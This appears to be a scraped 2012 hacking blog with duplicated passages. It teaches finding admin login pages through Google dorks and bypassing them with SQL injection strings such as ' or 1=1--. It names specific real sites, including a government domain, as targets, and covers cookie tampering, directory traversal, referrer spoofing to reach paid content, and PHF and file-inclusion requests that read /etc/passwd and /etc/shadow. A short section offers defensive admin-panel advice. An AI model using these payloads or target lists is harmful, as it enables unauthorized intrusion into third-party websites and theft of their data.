First of all goto google.com and search any one of the below dork in google and
open that
link....
inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:\\admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp
Click
On Search Button.
Then click on website URL. when its open there
will be space for entering
USER
NAME
OR
PASWORD
then in USERNAME box enter or Type
Admin
and in PASSWORD Type any one of the below code
:
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0
--
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
'
or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or
1=1--
or 1=1--
' or a=a--
" or "a"="a
') or
('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1
--
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi")
or ("a"="a
1' OR '1'='1
then hit enter key . .
.
now web has been hacked . . .
And Start Changing In
ADMIN PANEL Ok'z.
Test ur experinse
here
http://globaloiljobs.com/Admin_Login.asp
its Admin
Id (Username) Type 1' OR '1'='1
Or
Pasword 1' OR '1'='1
Tuesday, May 29, 2012
Sql Injection Manual Testing
Search for login or Admin login Pages.
ex: google dork. Go to google Home page
in search bar type.. " inurl:/admin/login.asp" or " inurl: /adminlogin.asp" ...somewhat like that
put the sql magic qoutes in username and password fields.There are many sql quotes like :
ex: google dork. Go to google Home page
in search bar type.. " inurl:/admin/login.asp" or " inurl: /adminlogin.asp" ...somewhat like that
put the sql magic qoutes in username and password fields.There are many sql quotes like :
admin' --admin' #admin'/*' or 1=1--' or 1=1#' or 1=1/*') or '1'='1--') or ('1'='1--- ='or''=
Protect Your Admin Panel
One of the main reasons why some government or private websites get hacked is the poor enforcement of security in their Admin Panel. After some nasty SQL Injection techniques, the next goal of the cracker is to find the admin page where he or she can put in the username and password he or she just got from the site. (I’m not really sure if there are ch1xorz who are into SQL Injection.lolz)
With the use of common google dorks like inurl:admin/admin.php or inurl:/admin/login.asp, a cracker could still find a lot of websites he can try out with easy to guess passwords (admin:admin) or the ‘ or ’1 = ’1 SQL Injection String (well, there are still a lot of strings but this is one of the common ones I know). But take note, there are still many ways of injecting a site but so far SQL Injection is really one of the most common attacks.
But with proper enforcement of security on the Admin Panel then you should be able to prevent some skiddie and easy attacks. And so let’s tackle 4 safety tips about some easy website configuration (the n00bz way) for the Admin Panel:
1. Enable HTTPS encryption or Use SSL Login Pages
This kind of encryption protects you from a script kiddie who does sniffing. Although HTTPS can be bypassed through SSL Strip but at least we can have some protection from easy MITM attacks. HTTPS is inarguably an important protection rather than an unencrypted HTTP which cripples your logins.
2. Edit The Name of Your Admin Panel
Don’t name your Admin Panel to common file names like admin.php, login.php, admin/login.asp, admin.php, cpanel.php, etc. Make sure your Admin Panel is not easy to find and cannot be scanned easily by common ‘Admin Finders’ on the net. If possible try an Admin Finder to check your website.
3. Enable or Create an .htaccess File
This kind of configuration allows website view restriction or site folder restriction especially in some sensitive files like backup files, scripts, and the Admin Panel. Adding a server-side protection around the Admin Panel folder is like adding a second layer of protection to your website. I suggest you only allow your IP address to login to your panel in order to stop people from trying to bypass your Admin Panel. If you have a fixed or static IP address, you might want to consider editing these codes:
allow from xxx.xxx.xxx.xxxdeny from xxx.xxx.xxx.xx
Under allow from, replace the xxx.xxx.xxx.xxx to your fixed IP Adress there so that it will only allow you who can see a certain folder from the site just like the Admin Panel. Then under deny from, replace xxx.xxx.xxx.xx, with the IP Adress you want to block to the site especially spammers and people who tries to invade your website. Take note you can add more values or IP Addresses under the deny from and allow from code.
4. Update your site
Fix your code and update your version. This article should help you in avoiding SQL Injection.
Well, that’s it for now! If you want to add some things about Web Admin Panel Security then just feel free to comment below and if you are interested in learning more about the .htacess file, click here.
Saturday, May 19, 2012
SQL INJECTION With "inurl:adminlogin.asp"
Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Login Page is found in Google with the query "inurl:admin/login.asp"
How is it possible that my page /admin/login.asp is found in Google with the query "inurl:admin/login.asp" while it isn't with the "site:www.domain.xx" query?
I've this line of code in my robots.txt:
I've this line of code in my robots.txt:
User-agent: *
Disallow: /admin/
<meta name="robots" content="noindex, nofollow" />
You can check on Google Webmaster if the robots.txt is interpreted correctly by Google. You can also request the removal of a URL from the index there.When you find the URL in the Google search result page (SERP), does it have the same title as found in your tag? And does it also have a description / snippet?
What I think is happening is that Google knows about the URL from a link on your site, so it'll attempt to crawl and index it. However, since it's blocked by robots.txt, it's not allowed to crawl the page, hence it can't see the noindex meta tag that's on your login page.
Since it doesn't know that it shouldn't index the page, Google will add the URL to it's index. However, pages like this tend to only have a title and URL in the SERP, and they almost always don't have a description/snippet. Sometimes the title in the SERP looks like they've crawled the page, but what they're actually doing is trying to generate a title based on the anchor text of the links that are pointing at it.
The sure fire way of having the page not show up in the SERP is to remove the Disallow: /admin/ command, and allow Googlebot to crawl the page and see the noindex,nofollow meta tag.
The noindex command will remove the page from the SERPs, and the nofollow will help inform Googlebot not to give priority to the links that it finds on your login page (this will help maintain your crawl efficiency, but does not guarantee Google won't crawl the links it finds on the page).
How To Hack A Website With Google?
First step: View the Source
Is to view the source of the page where you can find some useful things which may or may not include hidden directories. Most of lamers argue that there is nothing in the source but you have to look in the comments of the page where some web masters keep there personal data (such as contacts, e-mails….).If you doesn’t find any awesome information just have a quick look on the source for additional clue’s.
Second step : Search for Hidden Tags and Edit Existing values
find out the most abused <INPUT> tag in source make sure that all of them appear on the WEB page.If any extra tag appears then it’s a Hidden Tag. To view these hidden values use
you get a pop up of hello.To View/change the values use alert/void command respectively.
To view the first form values type
To change the value in the form use void command
Third step:Common File & Directory Search
check for common files and Directories such as admin.php,passwd.php,login.cgi,index2.php,login.asp,login.php,/Admin,/cg-bin/,/pub/,/images/,/scripts/,they are many common files and directories with which you may hang around for some hot stuff.
lets take a example.
A site may have a link to http://www.testingha...cretfile345.txt
after you pay or access any sensitive data it reports the file to web server. This technique is used by web masters to view the users IP or Location from where they are accessing the pages these are helpful to trace the intruders.
(A script on the web server does this job for a them)
Looking at the URI in the Location bar of the browser you could can access to the (above)file or log on the web server.
Another example of bypassing authorization is the CISCO IOS HTTP authorization vulnerability
The URL of the web based administration interface contains only a two digit number between 16 to 99.
http://www.testingha...NN/data/secret/.....
Just you have to guess the value of NN(16-99) to access the device’s administration interface at the highest privelige.
Fourth Step : Directory transversal
If you are familiar with BASIC DOS COMMANDS then you are aware of
http://www.victim.co...e/dirs/sub/dir/
the above the sample URL to access the sub directory use the dir transversal
This exploit is almost fixed don’t get disappointed we will go through with other techniques.
Fifth Step: cookie Manipulation
checkout for cookies if the site uses a plain text cookies then you may got some thing interesting..
To view cookie information type
Cookies are small piece of data which are used to identify the user(last visit,date,time). in short you can say client side validation. They are many articles on cookie stealing on hts.org and cs.net and videos on irongeek.com
PHP Injections
PHP is a server-side language
does the above one need explanation
Sixth step : referrer spoofing
referrer spoofing is another technique to override authentication .
Let take an example :
I have designed a site which has the above vulnerable..
here you may observe the if condition it is checking that the right side( 9 characters) of the url must be login.asp.(checking the tail of the url)
let see how these may be override..
it works becoz we got the right file name as our referrer .it may be any URL .but, the file name should be login.asp
what are you going to tell with that fuckin code??
May be the question arise. Let me explain if you are accessing porn sites they first check for authentication after that they set the values (variables) and they identify only with the referrers
:The classical PHF method
since some people are asking questions about the Phf method i will write how to use it here.
first in 95% of the time this method will not work since most people know about it and it has been fixed on most WebPages. all you have to do is to type in the address bar:
Seventh step: Generate Errors
generate error on the page. excluding 404 error. If you get any error except 404 or page not displayed. then it is vulnerable.such as 403,500,501
Note: every vulnerability may be or may not be exploitable
Eighth step: Googling
On this particular forums you might hear the term Google it.
Before asking questions(basic or Advanced ) use google .I will show you How to Use Google with a Hacker’s Point of view
looking in the cached (the big buckets of google) pages of configurations or Administrators page
Ninth step: Tools
Intellitamper : to scan the web
Nmap: port scanner
Stealth HTTP Scanner
WebSleuth : input validation attack
Black Widow : mirroring tool
WebCracker 5.0
Brutus AET2
CookieSpy
Paros
Due to the Post length the below topics are truncated Google it for more information
Topics Skipped:
SQL Injections,
XSS
Unpatched security flaws
Denial of Service
Improper Error Handling
Insertion of Malicious Commands or Command Modifiers,
Buffer Overflows
Active Session Hijacking
Client Side Caching
Forced Browsing
FAQ on the Step By Step Guide
Can I hack using this Guide?
It depends on How you exploit the vulnerablilties.The above guide is just the basics of hacks
First check for version of Browsers,Web Server,SMTP,OS
goto www.insecure.org where you can find the latest vulnerabilities and Exploits
Search Exploits for that Version ...
www.webattack.com
I need more explanation ?
Use google for the below keywords
• Input validation Attacks
• Directory Transversals (Path Truncation )
• Server side Executions
• Cross-site Scripting
• Cookie stealing
• Hidden Web Paths
• Escape Encoding
• NULL Byte
• Register_globals
• Attacking Web services and Data stores
• Common File Checks
• SQL Injection
• Man-in-the-middle Attacks
• Cookie Hijacking
• URL Obfuscation Attacks
• Session Hijacking
• Observing Customer Data
• Link Traversal
• Java Applet reverse engineering
• Parameter Passing
• Client-side Vulnerability Exploitation
• Friendly login URL’s
• Third-party shortened URL’s
• Host name obfuscation
• URL obfuscation
• IDN obfuscation methods
Is to view the source of the page where you can find some useful things which may or may not include hidden directories. Most of lamers argue that there is nothing in the source but you have to look in the comments of the page where some web masters keep there personal data (such as contacts, e-mails….).If you doesn’t find any awesome information just have a quick look on the source for additional clue’s.
Second step : Search for Hidden Tags and Edit Existing values
find out the most abused <INPUT> tag in source make sure that all of them appear on the WEB page.If any extra tag appears then it’s a Hidden Tag. To view these hidden values use
http://insteadof_regular_name type java script:<command> java script:alert(“here you have view the HTTP FORM submission to GET or POST) java script:alert(“hello”)
you get a pop up of hello.To View/change the values use alert/void command respectively.
To view the first form values type
java script:alert(document.forms[0].varname.value)Note: the first form is always zero not one …
To change the value in the form use void command
java script:void(document.forms[0].varname.value=”new value”
Third step:Common File & Directory Search
check for common files and Directories such as admin.php,passwd.php,login.cgi,index2.php,login.asp,login.php,/Admin,/cg-bin/,/pub/,/images/,/scripts/,they are many common files and directories with which you may hang around for some hot stuff.
lets take a example.
A site may have a link to http://www.testingha...cretfile345.txt
after you pay or access any sensitive data it reports the file to web server. This technique is used by web masters to view the users IP or Location from where they are accessing the pages these are helpful to trace the intruders.
(A script on the web server does this job for a them)
Looking at the URI in the Location bar of the browser you could can access to the (above)file or log on the web server.
Another example of bypassing authorization is the CISCO IOS HTTP authorization vulnerability
The URL of the web based administration interface contains only a two digit number between 16 to 99.
http://www.testingha...NN/data/secret/.....
Just you have to guess the value of NN(16-99) to access the device’s administration interface at the highest privelige.
Fourth Step : Directory transversal
If you are familiar with BASIC DOS COMMANDS then you are aware of
cd.. cd… cd\in the same way use the web directory transversal as following
http://www.victim.co...e/dirs/sub/dir/
the above the sample URL to access the sub directory use the dir transversal
http://www.victim.com/some/dirs/sub/dir/../ http://www.victim.com/some/dirs/sub/dir/../../If the web server is vulnerable then you may get access to the directories.
This exploit is almost fixed don’t get disappointed we will go through with other techniques.
Fifth Step: cookie Manipulation
checkout for cookies if the site uses a plain text cookies then you may got some thing interesting..
To view cookie information type
java script:alert(document.cookie)to change the value of the cookie use this
java script:void(document.cookie=”desired_variable=some value”)if the cookies are set on your computer then it would pop up with the values few people are afraid of cookies ‘they believe that the cookies may steal valuable data on there systems and these people doesn’t allow sites to set cookies on there browser”
Cookies are small piece of data which are used to identify the user(last visit,date,time). in short you can say client side validation. They are many articles on cookie stealing on hts.org and cs.net and videos on irongeek.com
PHP Injections
PHP is a server-side language
http://www.domain.com/index.php?page=main.php http://www.domain.com/index.php?page=maliciouspage.php http://www.domain.com/index.php?page=commonfile.php
does the above one need explanation
Sixth step : referrer spoofing
referrer spoofing is another technique to override authentication .
Let take an example :
I have designed a site which has the above vulnerable..
<%@ language =vbscript %>
<% option explicit %>
<html>
<head>
<title>
welcome to the members </title>
</head>
<body bgcolor=pink>
<h1>
welcome to members page</h1>
<% dim strreferer,bolpermit
strreferer=request.servervariables("http_referer")
if right(strreferer,9) ="login.asp" then
bolpermit=true
response.redirect “members.asp”
end if
if not bolpermit then
response.redirect "login.asp"
end if
%>
these poor coding from me coz I am in hurry to just finish the site.. ok lets come to the pointhere you may observe the if condition it is checking that the right side( 9 characters) of the url must be login.asp.(checking the tail of the url)
let see how these may be override..
http://localhost/login.asp or http://anysite.com./any/dir/login.asp
it works becoz we got the right file name as our referrer .it may be any URL .but, the file name should be login.asp
what are you going to tell with that fuckin code??
May be the question arise. Let me explain if you are accessing porn sites they first check for authentication after that they set the values (variables) and they identify only with the referrers
http://members.somepornsite.com/you got some stuff from the site which you want to access but it asks for credentials. To beat that do as follows
http://members.somepornsite.com/login.asp just leave blank or use the SQL injections for three or more times until you can get a warning page or invalid login page and note whether the site has set any cookie on your PC .read the variables carefully . if you toggle the values (variables ) or change the cookies you may access the members area http://members.somepornsite.com/some/dir/images/gotit.jpg or http://members.somepornsite.com/some/dir/movies/huge.mpgand they are many articles on referrer spoofing on cs.net check it out
:The classical PHF method
since some people are asking questions about the Phf method i will write how to use it here.
first in 95% of the time this method will not work since most people know about it and it has been fixed on most WebPages. all you have to do is to type in the address bar:
http://www.victim.com/cgi-bin/phf?Qalias=x%Oal/bin/cat%20/etc/passwd
Seventh step: Generate Errors
generate error on the page. excluding 404 error. If you get any error except 404 or page not displayed. then it is vulnerable.such as 403,500,501
Note: every vulnerability may be or may not be exploitable
Eighth step: Googling
On this particular forums you might hear the term Google it.
Before asking questions(basic or Advanced ) use google .I will show you How to Use Google with a Hacker’s Point of view
inurl:adminlogin.asp = search’s for adminlogins inurl:backup filetype:mdb = looks for old databases with logins "index of cgi-bin" = the directory of cgi-bin;) intitle:"PHP Shell *" "Enable stderr" filetype:php = a remote php shell intitle:"network administration" inurl:"nic" = A funny thing to take over networked printers "-dir/pws" "dir:cgi" "dir:sql" "dir:php" "dir:!bin" "filetype:*.*" filetype:pwd pwd inurl:"pwd" intitle:":" inurl:".com/accounts/NewAccount " intitle:"google" intext:"password" intitle:"Powered by Invision" intext:"invision" inurl:"invision" intitle:”Admin” intext:”password”for unix type of machines
"http://www.domain.com/index.php?page=/etc/shadow" or '?page=/etc/passwd'using google to scan a website
site:www.victim.comthe above one scans the entire site
looking in the cached (the big buckets of google) pages of configurations or Administrators page
cache:www.victim.com intext:500 cache:www.victim.com intext:”Administrator” cache:www.victim.com inurl:login | inurl:configGoogle itself warns that it is not responsible …… some stuff to view the links of website
link:www.victim.comto search a topic in abysmal manner
Google keyword filetype:pdf Advance hacking filetype:ppt Spoofing filetype:doc
Ninth step: Tools
Intellitamper : to scan the web
Nmap: port scanner
Stealth HTTP Scanner
WebSleuth : input validation attack
Black Widow : mirroring tool
WebCracker 5.0
Brutus AET2
CookieSpy
Paros
Due to the Post length the below topics are truncated Google it for more information
Topics Skipped:
SQL Injections,
XSS
Unpatched security flaws
Denial of Service
Improper Error Handling
Insertion of Malicious Commands or Command Modifiers,
Buffer Overflows
Active Session Hijacking
Client Side Caching
Forced Browsing
FAQ on the Step By Step Guide
Can I hack using this Guide?
It depends on How you exploit the vulnerablilties.The above guide is just the basics of hacks
First check for version of Browsers,Web Server,SMTP,OS
goto www.insecure.org where you can find the latest vulnerabilities and Exploits
Search Exploits for that Version ...
www.webattack.com
I need more explanation ?
Use google for the below keywords
• Input validation Attacks
• Directory Transversals (Path Truncation )
• Server side Executions
• Cross-site Scripting
• Cookie stealing
• Hidden Web Paths
• Escape Encoding
• NULL Byte
• Register_globals
• Attacking Web services and Data stores
• Common File Checks
• SQL Injection
• Man-in-the-middle Attacks
• Cookie Hijacking
• URL Obfuscation Attacks
• Session Hijacking
• Observing Customer Data
• Link Traversal
• Java Applet reverse engineering
• Parameter Passing
• Client-side Vulnerability Exploitation
• Friendly login URL’s
• Third-party shortened URL’s
• Host name obfuscation
• URL obfuscation
• IDN obfuscation methods
Wednesday, May 2, 2012
inurl:admin.asp
Besides the "inurl:login/admin.asp" and "inurl:administrator/login.asp", I want to tell you the last and also the most powerful keyword, that is "inurl:admin.asp", use it, you can almost get all results as you want. Following are the results I searched with it.
http://www.railway.gov.bd/admin.asp
http://demo.webwiznewspad.com/admin.asp
http://nichelocal.co.uk/admin_login.asp
http://arcvns.com/admin.asp
http://www.cormorantco.com/admin.asp
http://orders.packageexpress.net/entrack/admin.asp
http://www.fauxaesthete.com/admin/admin.asp
I only list some of search results, you can get more with the the keyword "inurl:admin.asp".
http://www.railway.gov.bd/admin.asp
http://demo.webwiznewspad.com/admin.asp
http://nichelocal.co.uk/admin_login.asp
http://arcvns.com/admin.asp
http://www.cormorantco.com/admin.asp
http://orders.packageexpress.net/entrack/admin.asp
http://www.fauxaesthete.com/admin/admin.asp
I only list some of search results, you can get more with the the keyword "inurl:admin.asp".
inurl:adminhome.asp
I the last post, I introduced the keywords "inurl:admin/login.asp",
now we try another keywords "inurl:adminhome.asp", following are the
search results with it.
http://www.wmoc.org/admin/adminhome.asp
http://www.mshsl.org/mshsl/administration/adminhome.asp
http://www.tigerdroppings.com/siteadmin/adminhome.asp
http://www.coruscant.co.in/siteadmin/adminhome.asp
http://correctscoreleague.com/AdminHome.asp
http://www.wmoc.org/admin/adminhome.asp
http://www.mshsl.org/mshsl/administration/adminhome.asp
http://www.tigerdroppings.com/siteadmin/adminhome.asp
http://www.coruscant.co.in/siteadmin/adminhome.asp
http://correctscoreleague.com/AdminHome.asp
inurl:admin/login.asp
Hi friends, last post I have introduced the keywords "inurl:administrator_login.asp", now we can try more interesting search. For example, "inurl:admin/login.asp" and "inurl:adminlogin.asp", following are the search results with the keywords.
--------------------------------------------------------------------------------
http://www.lhhb.com/admin/login.asp
http://www.udesa.co.za/admin/login.asp
http://www.railgourmet.com/admin/admin-login.asp
https://www.locallotto.ie/admin/login.asp
http://ejournals.ebsco.com/admin/login.asp
http://www.omha.net/standings/admin/login.asp
http://www.buzzle.com/admin/login.asp
http://www.nationalhuntingleases.com/admin/login.asp
http://www.myclubfinances.com/admin/login.asp
http://trip.gog.com.cn/admin/login.asp
http://www.igas.cn/admin/login.asp
http://www.mapsa.edu.ph/Admin/login.asp
http://www.zincfinancial.net/admin/login.asp
https://dirtcar.ticketforce.com/admin/login.asp
http://jobsearch.rediff.com/admin/login.asp
...
---------------------------------------------------------------------------------
Is it cool? Don't hesitate, just try it.
--------------------------------------------------------------------------------
http://www.lhhb.com/admin/login.asp
http://www.udesa.co.za/admin/login.asp
http://www.railgourmet.com/admin/admin-login.asp
https://www.locallotto.ie/admin/login.asp
http://ejournals.ebsco.com/admin/login.asp
http://www.omha.net/standings/admin/login.asp
http://www.buzzle.com/admin/login.asp
http://www.nationalhuntingleases.com/admin/login.asp
http://www.myclubfinances.com/admin/login.asp
http://trip.gog.com.cn/admin/login.asp
http://www.igas.cn/admin/login.asp
http://www.mapsa.edu.ph/Admin/login.asp
http://www.zincfinancial.net/admin/login.asp
https://dirtcar.ticketforce.com/admin/login.asp
http://jobsearch.rediff.com/admin/login.asp
...
---------------------------------------------------------------------------------
Is it cool? Don't hesitate, just try it.
inurl:administrator_login.asp
Last post,we have learned how to search the administrator login page by "inurl:administratorlogin.asp" keyword, now we can try "inurl:administrator_login.asp" for much results.
--------------------------------------------------------------------------------
http://www.tfpgroup.com/administrator_login.asp
http://www.ricpcu.org/directory/Administrator_login.asp
http://www.dev-30.info/administrator_login.asp
http://admin29471.brownhillscc.co.uk/administrator_login.asp
http://www.taksilahotel.com/Administrator_Login.asp
http://www.dlallwell.cn/managers/webhost__@__manager/administrator_login.asp
http://www.yzliangye.cn/yzly_admin/administrator_login.asp
http://asp.shanghann.com/dbms2010/administrator_login.asp
...
-----------------------------------------------------------------------------------
You can try more, for examples, "inurl:login/administrator.asp".
--------------------------------------------------------------------------------
http://www.tfpgroup.com/administrator_login.asp
http://www.ricpcu.org/directory/Administrator_login.asp
http://www.dev-30.info/administrator_login.asp
http://admin29471.brownhillscc.co.uk/administrator_login.asp
http://www.taksilahotel.com/Administrator_Login.asp
http://www.dlallwell.cn/managers/webhost__@__manager/administrator_login.asp
http://www.yzliangye.cn/yzly_admin/administrator_login.asp
http://asp.shanghann.com/dbms2010/administrator_login.asp
...
-----------------------------------------------------------------------------------
You can try more, for examples, "inurl:login/administrator.asp".
inurl:administratorlogin.asp
I have introduced a way to search the administrator login page by "inurl:login/admin.asp", and another way is to search "inurl:administratorlogin.asp" in google.
Following are the search results with "inurl:administratorlogin.asp" keywords.
------------------------------------------------------------------------------
http://twcares.org/AdministratorLogin.asp
http://www.eventphotos.ie/AdministratorLogin.asp
https://cp.serverdata.net/asp/administrator/Login.asp
https://www.freshcaviar.com/administrator/login.asp
http://learningcenter.fiu.edu/biology/administrator/login.asp
http://www.serica.com.tw/site-administrator-login.asp
http://www.bvthammythanhvan.com/administrator/login.asp
http://www.ktous.com/administrator/login.asp
http://www.tizzbird.cn/data/administrator/login.asp
http://www.byggren.no/Administrator/Login.asp
http://www.russoepartners.it/Administrator/login.asp
http://www.ywyaqi.com/administrator/login.asp
http://icuh.kimsonline.co.kr/administrator/login.asp
http://www.cn-yuhang.com/administrator/login.asp
http://www.2mcasa.it/administrator/login.asp
http://artandembroidery.com.my/administrator/login.asp
...
-------------------------------------------------------------------------------
You could also search by "inurl:administrator/login.asp" or "inurl:administrator login.asp" to get the results.
Following are the search results with "inurl:administratorlogin.asp" keywords.
------------------------------------------------------------------------------
http://twcares.org/AdministratorLogin.asp
http://www.eventphotos.ie/AdministratorLogin.asp
https://cp.serverdata.net/asp/administrator/Login.asp
https://www.freshcaviar.com/administrator/login.asp
http://learningcenter.fiu.edu/biology/administrator/login.asp
http://www.serica.com.tw/site-administrator-login.asp
http://www.bvthammythanhvan.com/administrator/login.asp
http://www.ktous.com/administrator/login.asp
http://www.tizzbird.cn/data/administrator/login.asp
http://www.byggren.no/Administrator/Login.asp
http://www.russoepartners.it/Administrator/login.asp
http://www.ywyaqi.com/administrator/login.asp
http://icuh.kimsonline.co.kr/administrator/login.asp
http://www.cn-yuhang.com/administrator/login.asp
http://www.2mcasa.it/administrator/login.asp
http://artandembroidery.com.my/administrator/login.asp
...
-------------------------------------------------------------------------------
You could also search by "inurl:administrator/login.asp" or "inurl:administrator login.asp" to get the results.
Tuesday, May 1, 2012
inurl:login/admin.asp
Do you know how to hack the web system, you could search by following keywords in Google to get the entrance of admin login page, and hack the password to enter the system.
The keywords are:
--------------------------------------------------------------------------------
http://www.vasterbo.com/zoo/login/admin.asp
http://www.parksidecoffeehouse.com/login/admin.asp
http://www.casualtyprotection.com/login-admin.asp
http://login.fanhow.com/login-admin.asp
http://www.normatech.it/login-admin.asp
http://www.radioclassics.com.ar/Multi-User%20Login/admin.asp
http://esvc000446.wic011u.server-web.com/login/login.asp?ret=/login/admin.asp
http://study.taaza.com/study/login-admin-asp
http://www.posidriv.no/login/admin.asp
http://www.gwretiquetas.com.br/sistema/login/LoginAdmin.html
http://www.fpk.it/pages/login/login.asp
http://linkopingshus42.se/login/admin.asp
http://rolandorolamentos.com.br/sistema/login/loginAdmin.html
http://www.fs-hyf.com/login-admin.asp
http://www.babushka.nu/login-admin.asp
...
--------------------------------------------------------------------------------
Click any url above, you can login from the admin page,you can use the hack softewares to hack the passwords.Most of the case, the default login username and password are "admin" .
The keywords are:
- "inurl:admin.asp"
- "inurl:login/admin.asp"
- "inurl:admin/login.asp"
- "inurl:adminlogin.asp"
- "inurl:adminhome.asp"
- "inurl:admin_login.asp"
- "inurl:administratorlogin.asp"
- "inurl:login/administrator.asp"
- "inurl:administrator_login.asp"
--------------------------------------------------------------------------------
http://www.vasterbo.com/zoo/login/admin.asp
http://www.parksidecoffeehouse.com/login/admin.asp
http://www.casualtyprotection.com/login-admin.asp
http://login.fanhow.com/login-admin.asp
http://www.normatech.it/login-admin.asp
http://www.radioclassics.com.ar/Multi-User%20Login/admin.asp
http://esvc000446.wic011u.server-web.com/login/login.asp?ret=/login/admin.asp
http://study.taaza.com/study/login-admin-asp
http://www.posidriv.no/login/admin.asp
http://www.gwretiquetas.com.br/sistema/login/LoginAdmin.html
http://www.fpk.it/pages/login/login.asp
http://linkopingshus42.se/login/admin.asp
http://rolandorolamentos.com.br/sistema/login/loginAdmin.html
http://www.fs-hyf.com/login-admin.asp
http://www.babushka.nu/login-admin.asp
...
--------------------------------------------------------------------------------
Click any url above, you can login from the admin page,you can use the hack softewares to hack the passwords.Most of the case, the default login username and password are "admin" .
Subscribe to:
Posts (Atom)